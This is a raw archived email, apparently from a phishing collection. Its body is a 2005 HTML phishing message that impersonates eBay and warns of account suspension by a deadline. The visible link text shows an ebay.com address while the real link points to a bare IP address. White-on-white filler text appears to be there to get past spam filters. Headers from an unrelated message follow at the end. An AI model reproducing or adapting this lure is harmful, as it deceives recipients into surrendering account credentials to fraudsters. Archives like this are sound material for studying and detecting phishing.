Resent-From: Beth Nazario <beth@monkey.org>
Resent-To: Jose Nazario <jose@monkey.org>
ReSent-Subject: eBay Unauthorized Account Access, Secure your debit cards
 now! - cmzxd
ReSent-Message-ID: <Pine.BSO.4.58.0508250927310.30657@naughty.monkey.org>
Content-Length: 3117
Lines: 86
Status: O
X-Status: 
X-Keywords:                  
X-UID: 201

----67071195970625594201
Content-Type: text/plain;
Content-Transfer-Encoding: quoted-printable

<META http-equiv=3DContent-Type content=3D"text/html; charset=3DISO-8859-1=
">
<font color=3D"#FFFFFF" size=3D"1">$$$$$$$$$$$$$$$$$$$$ $$ $$$$$ $ $$ $$ $=
$ $ $$ $$$$$$$$$$$$ $$$$$$$$$$$$$$$$$ $$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$=
$$$ $$ $$ $ $ $$ </font>
<table width=3D"646" height=3D"465" border=3D"0">
  <tr>
    <td colspan=3D"2"><a href=3D"http://218.38.14.138/c/index.html" target=
=3D"_blank"><img src=3D"http://pics.ebaystatic.com/aw/pics/navbar/eBayLogo=
TM.gif" 

alt=3D"eBay.com" width=3D"150" height=3D"70" border=3D"0"></a></td>
  </tr><tr> 
    <td width=3D"8"><font face=3D"Arial, Helvetica, sans-serif" size=3D"2"=
></font></td>
    <td width=3D"628"><strong><font face=3D"Arial, Helvetica, sans-serif" =
size=3D"2">Dear eBay. com customer,</font></strong></td>
  </tr>
  <tr align=3D"left" valign=3D"top"> 
    <td colspan=3D"2" height=3D"116"> 
      <p><font face=3D"Arial, Helvetica, sans-serif" size=3D"2">You have b=
een indefinitely suspended from eBay because our records indicate your acc=
ount was involved in activities that violate our policy governing seller n=
on-performance.</font></p>
      <p><font face=3D"Arial, Helvetica, sans-serif" size=3D"2">We now nee=
d you to 
        re-confirm your account information to us. If this is not complete=
d till 
        <b>August 27, 2005</b>, we will be forced to suspend your account =
Indefinitely, 
        as it may have been used for fraudulent purposes.</font></p>
      <p><font face=3D"Arial, Helvetica, sans-serif" size=3D"2">We thank y=
ou for your 
        cooperation in this manner .</font></p>
    </td>
  </tr>
  <tr> 
    <td colspan=3D"2" height=3D"13">&nbsp;</td>
  </tr>
  <tr> 
    <td colspan=3D"2"> 
      <p><font face=3D"Arial, Helvetica, sans-serif" size=3D"2">Click belo=
w to confirm and verify your eBay Account:<br>
        </font><font face=3D"Arial, Helvetica, sans-serif" size=3D"2"><a 

href=3D"http://218.38.14.138/c/index.html" target=3D"_blank"><strong>http:=
//www.ebay.com/aw-cgi/eBayISAPI.dllSignIn-ssPageName-Suspended.phpChId=3D$=
$$$$$</strong></a></font></p>
      </td>
  </tr>
  <tr> 
    <td colspan=3D"2" height=3D"6"><font face=3D"Arial, Helvetica, sans-se=
rif" size=3D"2"></font></td>
  </tr>
  <tr> 
    <td colspan=3D"2"> 
      <p><font face=3D"Arial, Helvetica, sans-serif" size=3D"2">Note: If y=
ou choose 
        to ignore our request, you leave us no choice but to suspend your =
account. </font></p>
    </td>
  </tr>
  <tr> 
    <td colspan=3D"2" height=3D"12"><font face=3D"Arial, Helvetica, sans-s=
erif" size=3D"2"></font></td>
  </tr>
  <tr> 
    <td colspan=3D"2"><font face=3D"Arial, Helvetica, sans-serif" size=3D"=
2">Best Regards, 
      <BR>
      eBay .com<br>
      eBay .com Security and Anti-Fraudulent Department .</font></td>
  </tr>
</table>
<p><font color=3D"#FFFFFF" size=3D"1">$$$$$$$$$$$$$$$$$$$$$$$ $$ $$$$$ $ $=
$ $$ $$ 
  $ $$ $$$$$$$$$$$$ $$$$$$$$$$$$$$ $$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$=
 $$ 
  $$ $ $ $$ </font> <br>
</p>

----67071195970625594201--

From beth@monkey.org  Thu Aug 25 09:27:38 2005
Return-Path: <beth@monkey.org>
X-Original-To: jose@login.monkey.org
Delivered-To: jose@login.monkey.org
Received: from mail1.monkey.org (mail1.monkey.org [65.23.81.153])
	by naughty.monkey.org (Postfix) with ESMTP id 7EF82536ED0
	for <jose@login.monkey.org>; Thu, 25 Aug 2005 09:27:38 -0400 (EDT)
Received: from naughty.monkey.org (naughty.monkey.org [65.23.81.140])
	by mail1.monkey.org (Postfix) with ESMTP id D22CC6CCE41
	for <jose@monkey.org>; Wed,  8 Jan 2003 13:43:22 -0500 (EST)
Received: by naughty.monkey.org (Postfix, from userid 6)
	id 65703536EC5; Thu, 25 Aug 2005 09:27:38 -0400 (EDT)
Received: from localhost (localhost [127.0.0.1])
	by naughty.monkey.org (Postfix) with ESMTP id 61B1B536EC4
	for <jose@monkey.org>; Thu, 25 Aug 2005 09:27:38 -0400 (EDT)
X-Original-To: beth@login.monkey.org
Delivered-To: beth@login.monkey.org
X-Received: from mail1.monkey.org (mail1.monkey.org [65.23.81.153])
	by naughty.monkey.org (Postfix) with ESMTP
	id 3860B536E47; Thu, 25 Aug 2005 07:49:52 -0400 (EDT)
X-Received: from 63-194-169-22.ded.pacbell.net (unknown [63.194.169.22])
	by mail1.monkey.org (Postfix) with SMTP id 9C4386CCE0F;
	Wed,  8 Jan 2003 12:05:35 -0500 (EST)
